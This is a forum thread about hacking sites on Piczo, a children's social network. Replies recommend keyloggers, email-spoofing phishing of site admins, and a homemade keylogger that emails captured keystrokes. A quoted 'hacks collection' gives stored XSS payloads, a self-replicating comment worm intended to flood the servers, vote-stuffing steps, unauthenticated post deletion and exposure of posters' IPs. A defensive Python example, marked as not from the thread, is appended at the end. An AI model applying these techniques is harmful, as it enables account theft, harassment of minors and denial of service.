Piczo

Addi
04-03-2006, 05:27 PM
Hi Guys,

I really need to hack a few Piczo sites, not because I'm a sad lonely noob or anything lol, just some serious matters. If u know anything which may help, please PM me a link or post on here.

Many thanks guys and girls :rolleyes:

Addi

Ezekiel
04-03-2006, 06:22 PM
Hi Guys,

I really need to hack a few Piczo sites, not because I'm a sad lonely noob or anything lol, just some serious matters. If u know anything which may help, please PM me a link or post on here.

Many thanks guys and girls :rolleyes:

Addi

Even just wanting to hack those lame sites makes you a n00b, so yes, it is because you are a sad lonely n00b. I don't know "piczo", but from a quick google it is another site that allows users to upload and make their own site, either by coding it or using their editor. So why would you think this is ANY different to "hacking" other sites?


just some serious matters

Oh sure, serious matters... Getting into some lame site like piczo is really a serious matter, isn't it. Why don't you get a life, now that is a more serious matter, or at least stop spamming this forum expecting people to do something you are too lazy or dumb to do yourself. Here's a site that can answer all your questions... http://www.google.com. Or even better, is the ***7 hacking site, http://*27.0.0.*, I believe they have a "click to hack" button to hack piczo and other crappy sites for people too dumb to make their own website. If you really want to get into someone's account, you could have at least looked at the HTML form used to log in, scanned the ports of the server to see what services are running, found out what HTTP server it is running on (Apache/IIS), then you could have learned something and wouldn't have had to spam this to us, or could have given us more details to work with than "I need to hack a few piczo sites".

Addi
04-03-2006, 10:14 PM
:eek: m8 I'm a newbie, I don't know how to find the site's ports, and even when I do I wouldn't know what 2 do with them.

No need 2 flame me, just give me a site to look on to teach me the real basics, or what to search in Google.

This is important, it ain't just no kiddie website on Piczo m8. If these sites ain't taken offline a breed of dog will be banned in England forever. Seems like nothing maybe 2 u, but ppl will lose their loved pets and innocent dogs will be put down?

Ezekiel
04-04-2006, 05:16 AM
:eek: m8 I'm a newbie, I don't know how to find the site's ports, and even when I do I wouldn't know what 2 do with them.

No need 2 flame me, just give me a site to look on to teach me the real basics, or what to search in Google.

This is important, it ain't just no kiddie website on Piczo m8. If these sites ain't taken offline a breed of dog will be banned in England forever. Seems like nothing maybe 2 u, but ppl will lose their loved pets and innocent dogs will be put down?

meh, it's your problem, not mine.


it ain't just no kiddie website on Piczo m8

Uh, yes it is, sites like that are specifically designed for losers who can't make their own website, if they were not a "kiddie website" they would find a real host, not some lame site like piczo. And if you want a bit more respect when posting, don't use words like 2, m8, u and ppl as a replacement for typing with real words. I will tell you now, you will not hack into a big, properly run site like piczo (well at least it looks like it is from 2 seconds googling it). So the only way would be to use a keylogger or social engineering, if you know the email of the admin of the site, some simple email spoofing asking them to "reactivate" their account, or sending them the keylogger could get you the password.

Addi
04-04-2006, 10:10 AM
:D OK, thanks for the advice Mike. These are kids running these websites. They are about ** and are wannabe gangsters who need to be taught a lesson.

What keylogger is easy to use and will get through firewalls? PM if you wish, Mike.

Ezekiel
04-04-2006, 11:55 AM
:D OK, thanks for the advice Mike. These are kids running these websites. They are about ** and are wannabe gangsters who need to be taught a lesson.

What keylogger is easy to use and will get through firewalls? PM if you wish, Mike.

First rule in hacking of how not to get flamed and called a n00b: Don't ask dumb questions like "how do I hack" or ask how to hack to get "revenge on your enemy" or some other lame excuse. I am not going to help someone with this attitude to hacking. We are not just here to solve your problems, and I am not going to possibly do something illegal just to "teach a lesson" to some loser. Hacking can be used for legal or illegal things, I really don't care, it's your own choice. But if you are going to do something illegal, you go and learn yourself, you don't expect people to actually do it for you. If you want a keylogger, have you considered using google?

http://www.google.com/search?hl=en&q=keylogger&btnG=Google+Search

A search for keylogger = 5 million results. And there were at least 5 keyloggers that were free on the first page of results. Even programming your own keylogger is not that difficult with a medium knowledge of C++; I just finished one that sends by email. All you need to know is the basics of the language (variables, classes, functions etc.) and how to use Winsock and the Windows API; throw in a GetAsyncKeyState function and check for which key was pressed, use Winsock to send to an SMTP server, and it's finished.

jaboone
01-25-2007, 12:06 AM
Edited by Moonbat - Please read our rules before posting

japa
06-28-2007, 07:40 PM
Edited by Moonbat - Please read our rules before posting

Moonbat
06-28-2007, 08:41 PM
You want help hacking Piczo? Here's a great article.


PICZO HACKS COLLECTION
.:GaMeBoY::HaCkEr:.
**th January 2007

This is basically a list of all the vulnerabilities and possible methods of attack I have found in the Piczo system. Piczo is a social networking site mostly used by children aged **-*7, and is very poorly coded. There are even spelling mistakes in the code! :O
Piczo currently has seven servers.

Most of the ways in which to exploit Piczo involve JavaScript injection and in-URL hacking, where the URL string is modified, and hence different data is sent to the Piczo servers.

1.A) Comment board XSS attacks.
This is probably the biggest threat to Piczo sites at the moment. All comment boards are currently vulnerable to cross site scripting, that is, you can post your own code, and it will be executed on the user’s machine when they view the site. I discovered this vulnerability just the other day, but I’m not sure if anyone else knows about it. I heard another guy called ProRatHack was also ‘hacking’ comment boards or something :s

So what can we do with XSS on Piczo? Well, you could be a lame n00b and use it for making alerts and pop-up boxes on the person’s site, but that wouldn’t be too cool. Here’s the code for it anyway if you want to see it:

alert(" the text goes here");

As you can see it’s pretty simple, just define the code type and do what you want. Don’t forget you can string JavaScript commands together with a semi-colon.
You could also use JavaScript to make the person’s comment board frame redirect to another site (think shock sites ;), and you could also affect the parent frame, but I can’t be bothered to explain that now.

Okay, that’s the lame stuff out of the way. Think about who normally uses Piczo… logged-in Piczo users! And think… they will probably be logged in when they view the comment board… we could redirect them to a cookie stealer and take their session IDs, sure, but there is an easier and more fun attack we can try…

1.B) Comment board XSS attacks – faking
We can post messages as other users, or actually make them automatically post messages when they are viewing the infected comment board. First you have to understand how it works:
http://pic6.piczo.com/go/commenton***rd?cb=62*5256&cbo=*245787&commentername=Santa&text=hello

Piczo comments for comment boards get sent to the servers in a URL, very insecure. Now of course, we can change the name that is displayed, but that would be too easy and not very fun. Instead, we can make a logged-in Piczo user that visits the site get redirected to the URL that posts messages, so if you used the window.location command (window.open is not suitable here as most people have pop-up blockers), they would appear to be posting the message, as the server is getting sent a request from their logged-in account ;)

So all we have to do is place one infected bit of code into the comment board, and anyone that visits the site will unwittingly post hundreds if not thousands of messages, and because there is no word limit on the comments, you can bomb the Piczo servers with data by doing this, hopefully resulting in a very primitive form of DoS, basically using up all their bandwidth, or even all their physical storage capacity.

So the resulting code would look like this:
window.location="http://pic6.piczo.com/go/commenton***rd?cb=62584*5&cbo=**28***&commentername=Santa&text=awwww you were hacked";

Of course, you would need to change the number after pic# (to define the server with the comment board you want to infect), the cb code, and the cbo code. Of course, you could make the other users post the code as well, which would make the code self-replicating, and almost impossible to kill. At the moment I’m working on a better fully fledged version of this code, which will scout out other Piczo sites by scanning the friends’ list on the site, and hopefully spreading through all of Piczo.

2. Piczo ratings system
Okay, you know those little boxes that people put on their sites, to make you vote for them, the type where there is a row of stars and the voting is instant? These are easy to ruin. All you have to do is view source for the page on which the ratings box is, and then search (Ctrl + F) for ‘ratingsForm’, and it should hopefully lead you to something that looks like this:

<form id="ratingsForm*487054**" name="website_*-*0" action="http://pic4.piczo.com/go/ratemysite" method="POST">
<input type="hidden" name="rating_id" value="57752" />
<input type="hidden" name="rating_score" value="*0"/>
<input type="hidden" name="rating_method" value="component">
<input type="hidden" name="elapsed" value="0"/>
</form>

See what it’s doing? It’s sending data to the address ‘http://pic4.piczo.com/go/ratemysite’, and this is what the URL would look like with the data affixed:

http://pic4.piczo.com/go/ratemysite?rating_id=57752&rating_score=*0&rating_method=component&elapsed=0

How easy was that? Lol. So basically, we can change that all we want before it gets sent to the server. We can change ‘rating_score’ to *, and vote for one star in the ratings box, and that URL can be used for any ratings box with a little adjustment; all that needs to be changed is the pic# server identifier at the start, and the rating_id, which defines which ratings box to vote for. Also remember to change the ‘elapsed’ value to something like 20 000.

Now, how to vote for this site millions of times? The data telling Piczo whether you have voted for a certain site already is stored in a cookie, silly Piczo. So just disable cookies in your browser (use the Web Developer extension for Firefox), and go to your voting URL. Then just keep refreshing it to vote multiple times. But that would take long, so download the ‘reload every’ extension for Firefox and open that voting URL in about 20 tabs. Then set each tab to reload once every minute.

3. Shoutbox ‘hacking’
Shoutboxes are very easy to destroy or ruin. You can delete other people’s posts very easily.

1. Find the URL of the shoutbox, as you will need to view the actual generated source code for the shoutbox, so go on the Piczo page with the shoutbox, and view source for it, search for ‘go/shoutbox?sb=’, which should lead you to a URL that looks like this (it’s tucked away in some iframe tags):
http://pic6.piczo.com/go/shoutbox?sb=4780*80&sbo=*245787

2. Now that you have that, navigate your browser to it, and you should see only the full shoutbox on your screen. Now, view source again, and scroll down and look for the messages. Each message will have a unique postView number. Now copy down the numbers for the messages you want to delete, and stick them in this URL:
(first you need to replace the sb and sbo numbers with the ones from the shoutbox URL you just used, and also use the correct pic# server identifier number, same as your shoutbox URL from just now)
Put the postView number of the message in the plpid parameter in the URL string, now navigate your browser to it, and the message should get deleted.

http://pic6.piczo.com/go/editpostapproval?dba=y&shout=y&sbo=*245787&sb=4780*80&plpid=46*707**&approvalstatus=delete

3.B) Fun but a bit useless
You still have the shoutbox URL from earlier, right? The one that looked like
http://pic6.piczo.com/go/shoutbox?sb=4780*80&sbo=*245787 ?
If so, just add ‘&isedit=y’ to the end of the address, so it looks like this:
http://pic6.piczo.com/go/shoutbox?sb=4780*80&sbo=*245787&isedit=y
Now, navigate to the new address. What do you notice? You can see the IP addresses of all the posters and also any messages that have been disapproved or hidden by the actual site owner :P

Also, you can add ‘&showWelcomeMessage=y’ to the end of the URL to show the ‘you are logged in’ message.

4. Guestbook ‘hacking’
Guestbooks can be ‘hacked’ using the same method described for the shoutbox trick. If you can’t work out how to modify the method to use it with guestbooks, you don’t deserve to have a computer. You can also use the JavaScript method, that is:
deletePost(46*72066)
And replace the number with the correct one.

There are many more ways to ruin Piczo but I can’t be bothered to write any more :D
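The quoted article leans on three server-side mistakes: comment text rendered without output encoding, a state-changing action (posting a comment) accepted from a bare URL so a redirected logged-in visitor posts on the attacker's behalf, and vote de-duplication left to a browser cookie. As an added, defender's-eye example (not code from this thread or from Piczo; the class and function names are hypothetical), this minimal Python model shows each of those weaknesses closed: comment text is HTML-escaped on output, comments are accepted only via POST with a per-session token, and ratings are recorded one vote per account on the server.

```python
# Added example, not from the thread or from Piczo. Names are hypothetical.
import hashlib
import hmac
import html
import secrets

SERVER_KEY = secrets.token_bytes(32)  # constructed per process; a real deployment persists this


def csrf_token(session_id: str) -> str:
    """Per-session token embedded in the site's own forms.

    A page that merely redirects a logged-in visitor (window.location) sends the
    victim's cookies but cannot supply this value, so the request is rejected."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def render_comment(name: str, text: str) -> str:
    """Output-encode user-controlled fields so script in a comment is shown, not executed."""
    return f"<li><b>{html.escape(name)}</b>: {html.escape(text)}</li>"


class CommentBoard:
    def __init__(self):
        self.posts: list[str] = []
        self.ratings: dict[str, dict[str, int]] = {}  # rating_id -> {account_id: score}

    def post_comment(self, method: str, session_id: str, token: str, name: str, text: str) -> bool:
        # Refuse the 'everything in a GET URL' pattern the article exploits.
        if method != "POST":
            return False
        # Constant-time compare of the submitted token against the session's expected one.
        if not hmac.compare_digest(token or "", csrf_token(session_id)):
            return False
        # Server-side length limit; the article notes the original had none.
        if len(text) > 1000:
            return False
        self.posts.append(render_comment(name, text))
        return True

    def rate(self, rating_id: str, account_id: str, score: int) -> bool:
        # One vote per account per ratings box, held on the server: clearing cookies
        # or reloading the URL in twenty tabs just overwrites the same entry.
        if not 1 <= score <= 10:
            return False
        self.ratings.setdefault(rating_id, {})[account_id] = score
        return True

    def average(self, rating_id: str) -> float:
        votes = self.ratings.get(rating_id, {})
        return sum(votes.values()) / len(votes) if votes else 0.0
```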